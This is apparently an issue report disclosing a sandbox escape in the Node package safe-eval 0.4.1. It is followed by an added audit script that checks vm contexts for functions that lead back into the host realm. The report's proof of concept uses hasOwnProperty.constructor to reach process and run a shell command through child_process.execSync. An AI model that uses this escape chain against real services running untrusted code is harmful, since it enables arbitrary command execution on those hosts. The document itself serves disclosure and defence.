Open
Description
```js
// node version: 19.8.1
// safe-eval version: 0.4.1
var safeEval = require('safe-eval')
let code = `
(function () {
  let ret = hasOwnProperty;
  ret.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
}());
`
safeEval(code);
```
We found a sandbox escaping bug. This bug can be triggered by using the hasOwnProperty function.
Also, we can execute arbitrary shell code using the process module.
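
Added example, not part of the original report or of safe-eval's own code: a realm audit that shows why a bare `hasOwnProperty` reaches the host's `Function` constructor. It assumes the sandbox is a Node `vm` context backed by a plain object; `hostRealmLeaks` and `INHERITED` are hypothetical names, and no payload is executed.

```javascript
// Added example: audit which identifiers inside a vm context resolve to
// functions created in the host realm. Assumes a sandbox built on node:vm.
const vm = require('node:vm');

// Names a plain-object context inherits from the host Object.prototype.
const INHERITED = ['hasOwnProperty', 'toString', 'valueOf', 'isPrototypeOf'];

// Return the names that, evaluated inside the context, yield a function whose
// constructor is the host Function, i.e. a handle back into the host realm.
function hostRealmLeaks(sandbox, names = INHERITED) {
  const context = vm.createContext(sandbox);
  return names.filter((name) => {
    let value;
    try {
      value = vm.runInContext(name, context);
    } catch {
      return false; // identifier is not defined in this context
    }
    return typeof value === 'function' && value.constructor === Function;
  });
}

// Plain object: lookups fall through to the host Object.prototype.
const plain = hostRealmLeaks({});

// Null-prototype object: the same names resolve to the context's own builtins.
const nullProto = hostRealmLeaks(Object.create(null));

// A host function handed to the sandbox is a leak regardless of the prototype.
const withHelper = Object.assign(Object.create(null), { log: () => {} });
const helperLeak = hostRealmLeaks(withHelper, ['log']);

console.log('plain object context:', plain);
console.log('null-prototype context:', nullProto);
console.log('null-prototype context with host helper:', helperLeak);
```

A null-prototype context removes only this inherited path; the Node documentation states that `node:vm` is not a security mechanism, so untrusted code still needs process-level isolation.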